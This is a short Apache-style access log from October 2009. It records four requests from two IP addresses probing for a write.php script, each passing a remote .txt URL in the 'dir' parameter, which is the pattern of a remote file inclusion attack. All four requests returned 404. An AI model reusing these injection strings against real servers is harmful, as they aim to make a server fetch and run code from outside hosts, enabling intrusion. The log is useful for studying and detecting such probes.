64.150.183.219 - - [16/Oct/2009:08:03:31 -0500] "GET /logs/access_log.1250553600//write.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:08:03:35 -0500] "GET //write.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:08:03:35 -0500] "GET /logs/access_log.1250553600//write.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:08:03:35 -0500] "GET /logs//write.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
